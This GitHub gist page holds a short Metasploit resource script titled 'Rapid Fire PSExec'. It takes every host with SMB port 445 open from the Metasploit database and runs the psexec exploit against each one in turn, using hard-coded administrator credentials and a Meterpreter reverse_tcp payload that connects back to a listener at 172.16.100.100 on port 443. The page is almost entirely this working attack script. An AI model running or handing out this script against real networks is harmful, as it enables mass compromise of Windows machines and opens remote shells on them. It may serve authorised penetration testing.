Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Rapid Fire PSExec resource script uses port number instead of service name
<ruby>
hosts = []
begin
framework.db.services.each do |service|
if ( service.port ==445 and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address}
end
end
end
self.run_single("set DisablePayloadHandler true")
hosts.each do |rhost|
self.run_single("set RHOST #{rhost['ip']}")
self.run_single('use exploit/windows/smb/psexec')
self.run_single('set PAYLOAD windows/meterpreter/reverse_tcp')
self.run_single('set LHOST 172.16.100.100')
self.run_single('set LPORT 443')
self.run_single('set DisablePayloadHandler TRUE')
self.run_single('set SMBUSER administrator')
self.run_single('set SMBPASS l33tpassword')
self.run_single('exploit -j')
sleep 1
end
</ruby>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment